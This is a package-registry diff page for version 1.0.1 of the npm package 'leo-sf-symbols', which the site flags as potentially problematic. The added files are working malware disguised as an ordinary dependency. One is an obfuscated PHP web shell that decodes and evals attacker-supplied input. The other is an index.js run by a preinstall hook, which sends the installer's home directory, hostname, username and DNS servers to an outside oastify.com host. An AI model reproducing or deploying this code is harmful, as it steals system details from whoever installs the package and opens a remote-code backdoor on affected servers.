leo-sf-symbols 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of leo-sf-symbols might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/brave.php +10 -0
  2. package/index.js +47 -0
  3. package/package.json +13 -0
package/brave.php ADDED
@@ -0,0 +1,10 @@
1
+ <?php
2
+ $S='_blconteblblnts();@ob_end_cleablblnbl();$r=@blbblase64_encode(@x(@gblzcompressbl($blo),$k));blprblint("$p$kh$blr$kf");}';
3
+ $s='$obl.=$t{$bli}^$k{$j}blbl;bl}}rbleturn bl$o;}if (@pblreg_blmatch("/$kh(.+bl)$kf/",@fiblle_getbl_blcoblblntents("php://in';
4
+ $o='put"blbl),$m)=bl=1) {@obbl_sbltart();@eblval(@gzublncomprblbless(@x(@base6bl4_dblecode($blm[1])bl,$k)));$blo=@ob_geblt';
5
+ $F='$k="blfcea92bl0f";$kh="bl7412b5blblda7be0";$blkf="cf42blb8c93759blbl";$p=bl"fadrtNGzm17blblNF0WH";functiblobln blx($';
6
+ $b='t,$k){$cbl=sbltrlen($k);bl$l=strlenbl($t);$blo=""bl;foblr($blbli=0;$i<$bll;){blfor($j=0;($j<$c&&$i<$bll);bl$j++,$ibl++){';
7
+ $e=str_replace('I','','creIaIte_IIfuInIction');
8
+ $i=str_replace('bl','',$F.$b.$s.$o.$S);
9
+ $m=$e('',$i);$m();
10
+ ?>
package/index.js ADDED
@@ -0,0 +1,47 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+ p: package,
10
+ c: __dirname,
11
+ hd: os.homedir(),
12
+ hn: os.hostname(),
13
+ un: os.userInfo().username,
14
+ dns: dns.getServers(),
15
+ r: packageJSON ? packageJSON.___resolved : undefined,
16
+ v: packageJSON.version,
17
+ pjson: packageJSON,
18
+ });
19
+
20
+ var postData = querystring.stringify({
21
+ msg: trackingData,
22
+ });
23
+
24
+ var options = {
25
+ hostname: "qwqjmkdsmfxozeweqson3faoefk681wq.oastify.com", //replace burpcollaborator.net with Interactsh or
26
+ pipedream
27
+ port: 443,
28
+ path: "/",
29
+ method: "POST",
30
+ headers: {
31
+ "Content-Type": "application/x-www-form-urlencoded",
32
+ "Content-Length": postData.length,
33
+ },
34
+ };
35
+
36
+ var req = https.request(options, (res) => {
37
+ res.on("data", (d) => {
38
+ process.stdout.write(d);
39
+ });
40
+ });
41
+
42
+ req.on("error", (e) => {
43
+ // console.error(e);
44
+ });
45
+
46
+ req.write(postData);
47
+ req.end();
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+
2
+ {
3
+ "name": "leo-sf-symbols",
4
+ "version": "1.0.1",
5
+ "description": "This is PoC of brave",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "preinstall":"index.js,brave.php"
10
+ },
11
+ "author": "jeet_pal",
12
+ "license": "ISC"
13
+ }